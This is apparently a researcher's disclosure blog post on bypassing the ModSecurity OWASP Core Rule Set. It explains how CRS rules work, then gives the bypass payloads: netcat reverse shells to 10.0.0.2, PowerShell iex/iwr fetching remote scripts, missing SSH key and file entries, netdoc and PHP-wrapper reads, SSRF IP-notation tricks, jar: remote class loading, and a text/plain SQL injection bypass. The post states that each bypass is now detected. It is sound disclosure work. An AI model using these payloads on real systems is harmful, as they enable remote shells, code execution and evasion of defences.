Breaking the WAF Wall: ModSecurity CRS

Hey everyone! I’m so stoked to finally share this blog post that’s been sitting in my drafts since 2023. Life got busy and I lost my writing mojo for a bit, but I’ve finally gathered enough energy to finish this one up!

Today’s post explores the bypasses I discovered for the OWASP CRS (Core Rule Set) Project during 1337UP0522 live hacking event hosted by The Paranoids team at Yahoo in collaboration with Intigriti. Needless to mention, the event was a blast!

We will first cover how CRS works internally, how the rules work and then talk about the bypasses. If you want to directly skip the Bypasses section, click here.

Quick Primer to WAFs

Web Application Firewalls (WAFs) serve as a crucial security layer that blocks web-based attacks. The concept is straightforward: when an attacker sends a malicious request, the WAF intercepts and blocks it before it can reach the web application. WAFs operate by detecting attacks through a set of predefined rules. ModSecurity, for instance, is a popular open-source WAF implementation. A widely-adopted and compatible ruleset for ModSecurity is available through the OWASP CRS (Core Rule Set) Project.

How does ModSecurity and CRS work together?

Before we explore the bypasses in detail, it is important to understand the relationship between ModSecurity and CRS. In essence, ModSecurity serves as the engine that inspects and analyses HTTP requests and responses, while CRS provides the ruleset that matches various attack patterns.

CRS works in phases when inspecting requests and responses. A high level overview of how CRS works depicted below:

Essentially, every phase of the WAF inspects certain parameters of the HTTP transaction for anomalies:

Phase 1: Inspects HTTP request headers (e.g. blacklisted user-agents, protocol violations, etc).
Phase 2: Inspects the HTTP request body / parameters (e.g. SQLI, XSS, RCEs, etc.)
Phase 3: Inspects the response headers (e.g. sensitive data leaks, session management, etc.)
Phase 4: Inspects the response body (e.g. sensitive data leaks, stack traces, etc.)
Phase 5: Logging what was found in the previous phases (for audits, rule tuning, etc.)

CRS uses Anomaly Scoring to decide whether a request gets through or gets blocked. It also gives you different Paranoia Levels that you can adjust based on how secure you want your setup to be.

Anomaly Scoring

From official docs:

Anomaly scoring, also known as “collaborative detection”, is a scoring mechanism used in CRS. It assigns a numeric score to HTTP transactions (requests and responses), representing how ‘anomalous’ they appear to be. Anomaly scores can then be used to make blocking decisions. The default CRS blocking policy, for example, is to block any transaction that meets or exceeds a defined anomaly score threshold.

In short, CRS uses a point-based system called Anomaly Scoring to determine if a request is malicious. Each suspicious pattern adds points to a request’s score. If the total score exceeds a threshold, the request gets blocked.

Paranoia Levels

From the official docs:

The paranoia level (PL) makes it possible to define how aggressive CRS is.

A higher paranoia level makes it harder for an attacker to go undetected. Yet this comes at the cost of more false positives: more false alarms. That’s the downside to running a rule set that detects almost everything: your business / service / web application is also disrupted.

Paranoia Levels let you define how thoroughly you want the WAF to examine incoming HTTP requests. CRS has 4 paranoia levels, level 1 to 4, with PL1 giving you basic protection and PL4 being super aggressive.

The higher you crank up those paranoia levels, the more rules get activated and the tighter the filtering becomes. PL4 can be a real pain in the neck even with regular traffic – it’s like having an overzealous bouncer at a club. Most folks stick with PL1 or PL2 to keep things running smoothly without going overboard.

Rules in CRS

Now let’s talk about how rules work in CRS.

Rules within CRS are defined by the SecRule directive. Each SecRule follows the following structure:

SecRule {VARIABLES} {OPERATOR} {"ACTIONS"}

VARIABLES: Defines which parts of the HTTP transaction to inspect (REQUEST_HEADERS, REQUEST_BODY, etc).
OPERATOR: Defines how to evaluate the rules, for example, regex matching (@rx), substring matching (@contains), etc.
ACTIONS: Defines what to do if the rule matches (phases, IDs, transformations, logging, blocking, scoring, etc).

So if a rule looks like:

SecRule REQUEST_HEADERS:User-Agent "@rx curl/.*" "id:1010,phase:1,log,pass,msg:'Detected curl client'"

Variable (REQUEST_HEADERS:User-Agent)

Directs ModSecurity to look at the User-Agent header.

Operator (@rx curl/.*)

Uses regular expressions to match any User-Agent containing curl/{any_version}.

Actions

Action (id:1010): Assigns a unique ID to the rule.
Action (phase:1): Runs the rule during request header parsing.
Action (log): Writes a log entry when the rule matches.
Action (pass): Allows the request to continue processing. No blocking or dropping occurs.
Action (msg:'Detected curl client'): Adds a custom message describing the detection.

The Bypasses

Now, lets talk about the bypasses. For the bypasses below, I will break down my thought process on how I crafted the bypasses, listing down the steps of crafting a bypass.

Spawning Reverse Shells

Spawning a reverse shell in *nix systems is pretty straightforward. A simple /bin/nc -e /bin/bash 10.0.0.2 10002 will connect back to your pingback server and you’ll be able to execute commands on the target machine. However, CRS properly detects and blocks the usage of nc (and all other variants).

This is where bash shell globbing patterns came to rescue. My first attempt at a bypass looked like:

/[abc]in/nc -e /bin/bash 10.0.0.2 10002

/[abc]in/nc expands to match:

/ain/nc
/bin/nc <- Points to our binary
/cin/nc

But that got blocked too, turns out /bin/bash was also on their radar. Time to RTFM. I found out that all other shell variants like /bin/sh, /bin/fish, /bin/ash were blacklisted, except for /bin/zsh. So I managed to figure out a workaround with:

/[abc]in/nc -e /bin/zsh 10.0.0.2 10002

But the pattern was still getting blocked as nc -e is pretty much the poster child for reverse shells. After some trial and error, I discovered that ln (the command for linking files) wasn’t getting caught. Here’s what the final bypass payload ended up looking like:

ln -s /[abc]in/nc /tmp/pew; /tmp/pew -e /bin/zsh 10.0.0.2 10002

At the time of publishing the article, a set of 5 rules detect the payload:

930120 - OS File Access Attempt (PL1)
932130 - Remote Command Execution: Unix Shell Expression Found (PL1)
932160 - Remote Command Execution: Unix Shell Code Found (PL1)
932240 - Remote Command Execution: Unix Command Injection evasion attempt detected (PL2)
932236 - Remote Command Execution: Unix Command Injection (command without evasion) (PL2)

Executing Arbitrary PowerShell

PowerShell has some pretty nifty cmdlets that let you grab and execute remote scripts straight in memory - no need for the payload to ever hit the disk. Here’s what a typical fileless attack technique looks like:

Invoke-Expression (Invoke-WebRequest http://10.0.10.10:8000/x.ps1)

Invoke-WebRequest fetches the x.ps1 file from the remote host and Invoke-Expression executes it as PowerShell code. As expected, CRS blocks both cmdlets Invoke-Expression and Invoke-WebRequest.

Windows Powershell, however, comes with a set of built-in aliases for a lot of the cmdlets – most of which ModSecurity did not have in its blacklists.

That gives us a neat bypass:

iex (iwr http://10.0.10.10:8000/x.ps1)

As you probably know, PowerShell can be used to run binaries directly, something like powershell.exe C:\windows\system32\notepad.exe which brings up a notepad. The cool thing is that PowerShell itself doesn’t need the .exe extension to work, and that gives us another way to slip past the rules. Nothing fancy, just a simple trick:

powershell C:\wind??s\*32\note*.exe

To break the above payload down:

powershell - Equivalent of powershell.exe
? - Matches exactly 1 character
* - Matches 0 or more charcters

So essentially:

wind??s matches windows
*32 matches the system32 folder
note*.exe matches notepad.exe

At the time of publishing the article, the following two rules detect the payload:

932120 - Remote Command Execution: Windows PowerShell Command Found (PL1)
932240 - Remote Command Execution: Unix Command Injection evasion attempt detected (PL2)

Accessing Local Files

This section of bypasses was more source code review than hacker magic. CRS blacklists a list of default sensitive files that should not be allowed in HTTP requests.

The blacklist for SSH private keys within CRS looked something like this:

.ssh/authorized_keys
.ssh/config
.ssh/id_dsa
.ssh/id_dsa.pub
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/identity
.ssh/identity.pub
.ssh/known_hosts

Already noticed what’s missing? Yep, .ssh/id_ecdsa and .ssh/id_ecdsa.pub are missing.

Similarly, it was missing a couple of other missing important files:

/etc/security/pwquality.conf
/etc/security/faillock.conf

These gives us our third bypass.

This bypass was properly fixed by updates to the lfi-os-files.data which is utilised by rule 930120.

930120 - OS File Access Attempt (PL1)

Abusing Legacy Protocols and PHP Wrappers

A lesser known, legacy Java (<= JDK 8) protocol is netdoc:, which acts similarly to the file: protocol in Java-based XML parsers. CRS appropriately detects usage of most protocols like http://, ftp://, file://, etc, but does not filter out netdoc:. This makes it possible to bypass CRS in Java environments (<= JDK 8).

netdoc:///etc/passwd

Now if we put all these missing files together, we can whip up something like this:

netdoc:///etc/security/pwquality.conf

Missing PHP wrappers also contributed to another bypass – I noticed that compress.zip://, zlib://, glob://, expect://, zip://, etc were blocked, however compress.bzip2:// wasn’t.

compress.bzip2://path/to/sensitive.bz2

The following set of rules detect these payloads now:

931130 - Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link (PL2)
933200 - PHP Injection Attack: Wrapper scheme detected (PL1)
942460 - Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters

Bypassing Blacklisted IP Address Notations

SSRF

The ssrf.data file contains a list of blacklisted IP address notations intended to prevent Server-Side Request Forgery (SSRF) attempts.

IP address notations are wild. For example, the following variations all resolve to the same IP address 1.0.0.1:

http://1.0.0.1
http://1.0.1
http://1.1
http://16777217
http://0x1.0x0.0x0.0x1
http://0x01000001
http://0x1.0x000001
http://01.00.00.01
http://000000001.0000.00000000.001
http://0100000001
http://%31%2e%30%2e%30%2e%31
http://1.0x0.00000000.0x1

If you’re bamboozled and scratching your head over how this is possible, I’d suggest you to read the inet_aton(3) manual.

When an SSRF exploit involves localhost IP addresses, the Core Rule Set (CRS) attempts to block such requests to prevent exploitation. However, such blacklisted IPs like 127.0.0.1 can be easily bypassed using alternate notations like:

http://127.1

Similarly, the blacklist for Oracle Cloud metadata endpoint (192.0.0.192) can be bypassed using:

http://192.192/{version}/metadata

Do note that this is probably the most straightforward technique. As noted earlier, you can use more creative approaches using hexadecimal notation, octal representations, and various IP encoding schemes to evade detection.

RFI

In Java environments, the JarURLConnection class permits access to the contents of a JAR file (or an entry within one) using a URL, including URLs with the http scheme. For example:

jar:http://10.0.123.234/bar/baz.jar!/COM/foo/qutie.class`

This retrieves the qutie.class file from the baz.jar archive via HTTP from 10.0.123.234.

Now lets say a malicious actor sets up a malicious JAR file on their server at 10.0.123.234 (which is a known blacklisted IP IOC) and tries to trick the target app into fetching classes straight from it. When you combine this trick with those sneaky IP notation bypasses we just covered, you can cook up some nasty payloads like:

jar:http://10.31722/bar/baz.jar!/COM/foo/qutie.class
jar:http://167803882/bar/baz.jar!/COM/foo/qutie.class

Both examples resolve to the attacker-controlled IP 10.0.123.234, allowing malicious retrieval of the qutie.class file.

At the time of writing this blogpost, the following 2 rules detect the above payloads:

931130 - Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link
934110 - Server Side Request Forgery (SSRF) Attack: Cloud provider metadata URL in Parameter

Complete Request Body Bypass

This one is definitely worth highlighting as it is probably the most interesting finding that I had stumbled upon.

While digging through the documentation and source code to understand how ModSecurity decides which rules to activate, I stumbled upon something interesting: ModSecurity uses specific body processors based on what Content-Type header it detects. These processors are basically designed to take the request body and break it down into something the rules can actually work with.

The JSON and XML parsers get turned on dynamically by rules in the ModSecurity config, usually through the ctl:requestBodyProcessor action within a SecRule that matches the right Content-Type header.

Here are the parsers that the WAF engine can handle:

application/x-www-form-urlencoded: This is the standard for regular forms. ModSecurity takes this and breaks it down into ARGS (arguments) variables that the rules can access.
multipart/form-data: Used when you’re uploading files. This one’s a bit more complicated since it needs special parsing to tell the difference between regular form fields and the actual uploaded files.
application/json: This triggers the JSON parser.
(text|application)/xml: This triggers the XML parser.

This got me thinking – what about backends that do not rely on the Content-Type header to process requests? What happens when I use text/plain? To my surprise, it actually worked. Payloads as simple as cat ../../etc/passwd (which will easily get detected at PL1) sailed right through the WAF completely unchecked.

Let’s try to understand why this bypass is quite lethal.

Suppose a user login endpoint request looks something like this:

POST /login HTTP/1.1
Host: api.domain.com
Content-Type: application/json
Content-Length: 40

{"username":"admin","password":"admin"}

A classic SQL injection attack to bypass the login flow would look like this:

POST /login HTTP/1.1
Host: api.example.com
Content-Type: application/json
Content-Length: 48

{"username":"admin","password":"idkthepassword' OR 1=1--"}

With CRS enabled, the following rules would come shouting at you:

942130 PL2 SQL Injection Attack: SQL Boolean-based attack detected
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942330 PL2 Detects classic SQL injection probings 1/3
942390 PL2 SQL Injection Attack
942521 PL2 Detects basic SQL authentication bypass attempts 4.1/4
942522 PL2 Detects basic SQL authentication bypass attempts 4.1/4

If you set the Content-Type header to text/plain and the backend doesn’t bother checking the header and just goes ahead and decodes the request body anyway, ModSecurity will fall back to its default request body parser. This allows you to slip in any payload within the request.

POST /login HTTP/1.1
Host: api.example.com
Content-Type: text/plain
Content-Length: 48

{"username":"admin","password":"idkthepassword' OR 1=1--"}

The CRS project has since removed the non-standard text/plain from its list of allowed values within the Content-Type header (6a9c854) and has introduced a warning message about the bypass:

# Bypass Warning: some applications may not rely on the content-type
# request header in order to parse the request body. This could make
# an attacker able to send malicious URLENCODED/JSON/XML payloads
# without being detected by the WAF. Allowing request content-type
# that doesn't activate any body processor (for example: "text/plain",
# "application/x-amf", "application/octet-stream", etc..) could lead
# to a WAF bypass. For example, a malicious JSON payload submitted with
# a "text/plain" content type may still be interpreted as JSON by a
# backend application but would not trigger the JSON body parser at the
# WAF, leading to a bypass. To avoid bypasses, you must enable the appropriate
# body parser based on the expected data in the request bodies (For example
# JSON for JSON data, XML for XML data, etc).

The WAF now properly detects and flags such non-standard content-types via:

920420 - Request content type is not allowed by policy

Credits Where Its Due

ModSecurity and the OWASP Core Rule Set (CRS) are invaluable contributions to the open-source community.

I want to give a huge shoutout to their maintainers for keeping such a critical security project alive and well. I also extend my gratitude to Intigriti and the @TheParanoids team at Yahoo for organizing the hacking event and for the kind invitation to participate.

That’s all folks. Thanks for sticking with me through this! Cheers! 🥂